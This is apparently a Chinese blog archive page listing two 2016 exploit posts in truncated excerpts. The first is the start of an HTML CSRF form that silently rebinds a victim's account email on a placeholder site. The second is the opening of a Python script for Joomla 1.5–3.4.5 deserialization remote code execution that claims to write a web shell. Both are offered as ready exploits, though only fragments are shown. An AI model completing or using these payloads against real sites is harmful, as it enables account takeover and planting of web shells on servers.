02 2016 档案
csrf利用EXP
摘要:<html><body><form action="http://www.xxx.com/user/setting/email_bind.html" method="post"><input type="hiden" name="new_email" value="xxx@163.com" /></ 阅读全文
posted @ 2016-02-28 22:53 milantgh 阅读(432) 评论(0) 推荐(0)
Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)
摘要:Usage:x.py http://xxx.com # coding=utf-8# author:KuuKi# Help: joomla 1.5-3.4.5 unserialize remote code executionimport urllib2import cookielib,syscj = 阅读全文
posted @ 2016-02-16 19:40 milantgh 阅读(3985) 评论(0) 推荐(0)